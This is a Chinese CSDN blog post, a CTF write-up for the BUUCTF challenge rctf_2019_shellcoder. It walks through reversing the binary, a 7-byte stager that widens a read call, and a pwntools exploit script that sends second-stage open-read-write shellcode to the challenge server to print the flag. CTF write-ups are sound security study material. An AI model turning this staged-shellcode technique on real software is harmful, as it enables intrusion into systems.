手写shellcode

最新推荐文章于 2023-10-20 21:56:43 发布
最新推荐文章于 2023-10-20 21:56:43 发布
阅读量392 收藏
点赞数
分类专栏: pwn BUUCTF CTF 文章标签: linux 安全 python c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/127435090
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

rctf_2019_shellcoder

分析

请添加图片描述

逆向分析
f5报错,出现这个错误的原因就是我们的F5插件不能正确识别这个call的参数
在这里插入图片描述
先找到0x45f位置,F5然后返回到报错函数F5即可
在这里插入图片描述
仔细分析函数通过syscall函数进行函数调用,结合终端运行结果分析出每个函数
请添加图片描述

jmp_rdi这个函数会跳转执行read函数读入的数据,可注入shellcode,可是只能读入7字节,
read函数的汇编代码
请添加图片描述

将数据读入到0xF4F4F4F4F4F4F4F4即rbx寄存器存放的位置,之后将rbx赋给rdi,跳转执行rdi处的数据
看一下jmp_rdi的汇编代码,
请添加图片描述

会先对每个寄存器清空,之后再跳转执行我们输入的数据

我们可以先输入小于7字节的数据来改变read的三个参数

mov dl,100 #1 rdx=100  这里的100随便写一个大于第二次注入的shellcode小于16位寄存器最大大小就可以
xchg rsi, rdi #3 rsi=0xF4F4F4F4F4F4F4F4,rdi=0
syscall #2 rax=0 ![请添加图片描述](https://img-blog.csdnimg.cn/854a1cf9a85342be8bf5b489da0aafa8.png)

之后程序执行后再次执行read函数,这时我们已经可以输入100字节了,输入shellcode即可,这里直接orw

exp

# coding=utf-8
from pwn import  *
context(endian='little',os='linux',arch='amd64',log_level='debug')
sh = remote('node4.buuoj.cn',29849) #连接远程程序
 
 
s       = lambda data               :sh.send(data)
sa      = lambda delim,data         :sh.sendafter(delim, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda delim,data         :sh.sendlineafter(delim, data)
r       = lambda num=4096           :sh.recv(num)
ru      = lambda delims		        :sh.recvuntil(delims)
itr     = lambda                    :sh.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))
def dbg():
        gdb.attach(sh)
        pause()

shellcode1 = asm('''
mov dl,100      #1  rdx=255
xchg rsi, rdi   #3  rsi=0xF4F4F4F4F4F4F4F4,rdi=0
syscall         #2  rax=0      
''')
 
shellcode2=asm('''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
''')
lg('shellcode1',len(shellcode1))
lg('shellcode2',len(shellcode2))
s(shellcode1)
sleep(0.01)
s(shellcode1 + shellcode2)
itr()
tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手搓shellcode的学习记录
weixin_44864859的博客
07-24 421
虽然我们可以利用pwntools自动生成shellcode,也可以利用alpha生成纯字符的shellcode绕过某些限制,但是当程序对输入限制较为严苛时,就不得不和这些自动化工具说再见了。由于之前完全没有手写shellcode的经验,所以本文主要是理解分析其他师傅的shellcode,尝试从中获得技巧和方法(说得明白点就先从照葫芦画瓢开始。。。) 首先直接来看题,这是2020 NUAA CTF的一道题,主要考点是ascii shellcode,难点在于限制只能用0x1f-0x7f的字符,并且buf长度只有
Custom Shellcode
最新发布
05-16
Custom Shellcode 代码参考.
★pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 2773
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
如何写一个shellcode
qq_40712959的博客
01-16 513
什么样的shellcode可以起到最大的破坏,那就是能够满足攻击者各种各样需要的shellcode,怎么才能满足各种各样的需要呢?调用shell。 如何写一个shellcode,以需要execve()系统调用的shellcode为例: %eax:eax寄存器需要存储11,这是execve()的系统调用号(system call number) %ebx:存储控制字符串“/bin/sh”的地址(e...
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3104
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
书写Linux下自己的shellcode
南飞的侯鸟
03-12 1055
 原    作:aleph1 翻译注释:warning3  1999/07 验证修改:scz  2000/01/13 概述:     aleph1书写了这篇经典文章,首先要向他致敬。     tt整
编写"优美"的SHELLCODE
weixin_30405421的博客
07-08 73
◆ 编写"优美"的SHELLCODE作者:watercloud主页:http://www.nsfocus.com 日期:2002-1-4 SHELLCODE的活力在于其功能,如果在能够完成功能的前提下又能比较"优美",那么就更能体现shellcode的魅力.个人认为shellcode的优美能在两个地方表现:shellcode本身应该尽量的短小.shellcode的书...
shellcode.rar
07-12
Shellcode是一种特殊的低级代码,通常用汇编语言编写,其主要目的是在目标系统上执行特定功能,如打开网络连接、执行命令或者绕过安全机制。在网络安全领域,Shellcode常被利用于exploit(漏洞利用)技术,当攻击者...
shellcode转unicode工具
06-13
这是一款超级便宜的shellcode转unicode工具,非常好用!
CDL_shellcode_源码
10-02
在IT领域,Shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞执行任意命令。Shellcode安全研究和逆向工程中扮演着重要角色,它可以直接在目标进程中运行,绕过安全机制,执行攻击者指定的操作...
Shellcoder编程揭秘 Shellcoder编程揭秘
08-29
Shellcoder编程揭秘 Shellcoder编程揭秘
Shellcoder手册(很强大的Shellcoder)溢出学习必备!
04-25
Shellcoder手册(很强大的Shellcoder)溢出学习必备!。<br>1 :在开始之前<br>2 :栈溢出<br>3 :Shellcode<br>4 :格式化串漏洞<br>5 :堆溢出<br>6 :Windows的广阔原野<br>7 :Windows Shellcode<br>.<br>.<br>.<br>.<br>
Shellcoder编程揭秘
10-26
Shellcoder编程揭秘:全书的内容紧密围绕shell code编程展开,系统地阐述了作为一名shell coder应该掌握的知识要点。除了shell code之外,作者还介绍了手机,BIOS等涉及安全的新领域。   本书的部分介绍了编写shell code前应掌握的一些基本概念,应熟悉的软件工具等内容,还介绍了利用GPRS入侵的细节。第2部分则以常见的栈溢出、堆溢出问题开始,接着介绍了SEH、格式化漏洞等内容,后介绍怎样解决这些漏洞,并以实际的漏洞为例,讲解怎样利用漏洞。第3部分主要放在编写shell code上,介绍怎样编写适应多种环境的shell code,除了以Windows平台为主,还稍带介绍了Linux平台上shell code,5章则介绍了怎样编译与反编译shell code。第4部分介绍了网络蠕虫与病毒。第5部分介绍了防火墙,蜜罐,和其他的保护系统。重点介绍了怎样突破这些保护系统。第6部分介绍了除常见攻击对象之外的其他目标,如无线网络,手机,BIOS等。   书中还包括了大量未分开的用C/iC编语言编写攻击代码的技巧。
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等,测试类时发现基本的类是可以满足的不要使用c++的一些库,切记
Shellcode 藏在图片中
12-07
最近某安全会议上的某个的PPT,是英文的,内容如题所示是关于shellcode隐藏技术的。
shellcode分析工具.zip
05-25
用来加载shellcode的程序,execsc.exe是cuckoo自带的,sc_test.exe是导师给的。
写一个简单的shellcode
weixin_30685029的博客
06-10 178
0x00 前言 漏洞利用中必不可缺的部分就是shellcode,不会编写shellcode和咸鱼有什么区别,跳出咸鱼第一步。 0x01系统调用 通过系统调用execve函数返回shell C语言实现:#include<unistd.h> #include<stdlib.h> char *buf [] = {"/bin/sh",NULL}; void ...
linux手写x64的shellcode
小小鱼的博客
08-25 1167
编写汇编代码 下面的代码实现的是执行 execve("/bin/sh") 命令,rax寄存器存放execve的系统调用编号,rdi存放的是execve的参数: section .text global _start _start: push rax xor rdx, rdx xor rsi, rsi mov rbx,'/bin//sh' push rbx push rsp pop rdi mov al, 59 syscall 关于x64的系统调用表可参考如下博文: https://blog.csdn.ne
shellcode downloader
01-08
Shellcode downloader(壳代码下载器)是一种恶意软件的一部分,用于在受感染的系统上下载和执行恶意shellcode。它通常由黑客或攻击者利用系统的弱点,如漏洞或错误配置,将其注入到受感染系统的进程中。 Shellcode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值